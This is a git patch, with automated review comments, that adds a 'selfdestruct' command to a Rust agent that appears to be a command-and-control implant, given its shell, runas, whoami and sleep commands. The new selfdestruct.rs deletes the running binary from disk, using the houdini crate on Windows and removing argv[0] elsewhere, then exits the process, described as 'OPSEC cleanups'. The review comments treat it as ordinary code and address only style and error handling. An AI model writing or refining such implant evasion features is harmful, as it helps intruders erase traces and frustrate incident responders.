From a718b56add520b9fc0bc367066172824fa623072 Mon Sep 17 00:00:00 2001 From: husky Date: Wed, 9 Mar 2022 17:01:14 -0500 Subject: [PATCH] self destruct mvp --- agent/Cargo.lock | 10 +++++++++ agent/Cargo.toml | 2 ++ agent/src/cmd/mod.rs | 4 ++++ agent/src/cmd/selfdestruct.rs | 38 +++++++++++++++++++++++++++++++++++ agent/src/main.rs | 1 + 5 files changed, 55 insertions(+) create mode 100644 agent/src/cmd/selfdestruct.rs diff --git a/agent/Cargo.lock b/agent/Cargo.lock index 6d7e783..3e7d493 100755 --- a/agent/Cargo.lock +++ b/agent/Cargo.lock @@ -282,6 +282,15 @@ dependencies = [ "libc", ] +[[package]] +name = "houdini" +version = "1.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a21c047df31ebe5936e1a8f8a1fd1020933fca89909625c481b651273b97eef" +dependencies = [ + "winapi 0.3.9", +] + [[package]] name = "http" version = "0.2.6" @@ -583,6 +592,7 @@ dependencies = [ "base64", "cidr-utils", "embed-resource", + "houdini", "is-root", "kernel32-sys", "libc", diff --git a/agent/Cargo.toml b/agent/Cargo.toml index 9705fdd..510567d 100755 --- a/agent/Cargo.toml +++ b/agent/Cargo.toml @@ -27,6 +27,8 @@ embed-resource = "1.6" kernel32-sys = "0.2.2" winapi = { version = "0.3.8", features = ["winnt","winuser", "handleapi", "processthreadsapi", "securitybaseapi"] } winreg = "0.10" +houdini = "1.0.2" + [profile.dev] opt-level = 0 diff --git a/agent/src/cmd/mod.rs b/agent/src/cmd/mod.rs index fcecdfc..2d49634 100755 --- a/agent/src/cmd/mod.rs +++ b/agent/src/cmd/mod.rs @@ -24,6 +24,7 @@ mod sleep; mod shutdown; mod whoami; mod unknown; +mod selfdestruct; /// All the possible command types. Some have command strings, and some don't. pub enum CommandType { @@ -37,6 +38,7 @@ pub enum CommandType { Ps, Pwd, Save, + Selfdestruct, Runas, Shell, Shutdown, 
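Review bot: In the Cargo.toml hunk, `houdini = "1.0.2"` is added as an unconditional entry under the existing dependencies, but the only use this commit adds is behind `#[cfg(windows)]` in selfdestruct.rs, so non-Windows builds fetch and compile the crate (and its `winapi 0.3.9` dependency, per the Cargo.lock hunk) for nothing. Declaring it in a `[target.'cfg(windows)'.dependencies]` table instead, as `houdini = "1.0.2"`, keeps it out of those builds while leaving the Windows build unchanged. The extra `+` blank line after it also appears to leave two empty lines before `[profile.dev]`, though the collapsed layout makes that hard to be sure of.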
@@ -156,6 +158,7 @@ impl NotionCommand {
 "pwd" => CommandType::Pwd,
 "runas" => CommandType::Runas,
 "save" => CommandType::Save,
+ "selfdestruct" => CommandType::Selfdestruct,
 "shell" => CommandType::Shell,
 "shutdown" => CommandType::Shutdown,
 "sleep" => CommandType::Sleep,
@@ -182,6 +185,7 @@ impl NotionCommand {
 CommandType::Pwd => pwd::handle().await,
 CommandType::Runas => runas::handle(&self.args).await,
 CommandType::Save => save::handle(&mut self.args, config_options).await,
+ CommandType::Selfdestruct => selfdestruct::handle().await,
 CommandType::Shell => shell::handle(&mut self.args).await,
 CommandType::Shutdown => shutdown::handle().await,
 CommandType::Sleep => sleep::handle(&mut self.args, config_options).await,
diff --git a/agent/src/cmd/selfdestruct.rs b/agent/src/cmd/selfdestruct.rs
new file mode 100644
index 0000000..3f2f893
--- /dev/null
+++ b/agent/src/cmd/selfdestruct.rs
@@ -0,0 +1,38 @@ +use std::error::Error; +use std::env::args; +use std::fs::remove_file; +#[cfg(windows)] use houdini; +#[cfg(windows)] use rand::{thread_rng, Rng}; +#[cfg(windows)] use rand::distributions::Alphanumeric; + + +pub async fn handle() -> Result> { + /// Performs some OPSEC cleanups, deletes itself from disk, and kills the agent. + /// Burn after reading style. + /// For Windows, makes use of Yamakadi's fantastic houdini crate, based on jonaslyk's self-deleting binary research and byt3bl33d3r's Nim POC + /// For Nix, just deletes arg[0] lol. + /// Usage: selfdestruct 🎯 + + // TODO: Overwrite proc memory with junk + + // Delete bin on disk + + #[cfg(windows)] { + let rand_string: String = thread_rng() + .sample_iter(&Alphanumeric) + .take(12) + .map(char::from) + .collect(); + + houdini::disappear_with_placeholder(rand_string); + } + + #[cfg(not(windows))] { + let running_agent: String = args().nth(0).unwrap(); + remove_file(running_agent)?; + } + + // Shutdown agent + // In main.rs, shutdown::handle exits the current running process + Ok("[!] This agent will now self-destruct!\n[!] 3...2...1...💣💥!".to_string()) +} \ No newline at end of file diff --git a/agent/src/main.rs b/agent/src/main.rs index ec251a6..f9d3fb3 100755 --- a/agent/src/main.rs +++ b/agent/src/main.rs @@ -144,6 +144,7 @@ async fn main() -> Result<(), Box> { // Like shutting down the agent match notion_command.command_type { CommandType::Shutdown => {exit(0);}, + CommandType::Selfdestruct => {exit(0)}, _ => {} } };
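Review bot: The five `///` lines at the top of `handle`'s body are outer doc comments placed inside a function body, where rustc reports them under the `unused_doc_comments` lint and rustdoc attaches them to nothing; they belong above `pub async fn handle()`, with the one-sentence summary first and the Windows/Unix mechanism and the `Usage:` line following as separate paragraphs, while `// TODO: Overwrite proc memory with junk` stays a plain comment. Two smaller points in the same hunk: `args().nth(0).unwrap()` panics instead of returning an error if argv is empty or not valid Unicode, so `let running_agent = args().next().ok_or("argv[0] unavailable")?;` keeps the failure inside the `Result` the signature already promises (assuming the error type is `Box<dyn Error>`, as the `use std::error::Error;` import suggests); and on the Windows path the value returned by `houdini::disappear_with_placeholder(rand_string)` is discarded, so if that call returns a `Result` (check the crate's docs) a failure is still reported as success by the `Ok(...)` message that follows. `#[cfg(windows)] use houdini;` is redundant on edition 2018 and later, where extern crates are already in scope, and `rand` is imported here but not added in this commit's Cargo.toml hunk, so presumably it is already a dependency — worth confirming.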
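Review bot: In the main.rs hunk the new arm `CommandType::Selfdestruct => {exit(0)},` differs from its neighbour `CommandType::Shutdown => {exit(0);},` only in the trailing semicolon, and both arms do the same thing; folding them into one arm, `CommandType::Shutdown | CommandType::Selfdestruct => exit(0),`, removes the duplication and the inconsistency, and since `exit` returns `!` neither form needs the braces. The enclosing `match` sits inside `main`, which starts and ends outside this hunk.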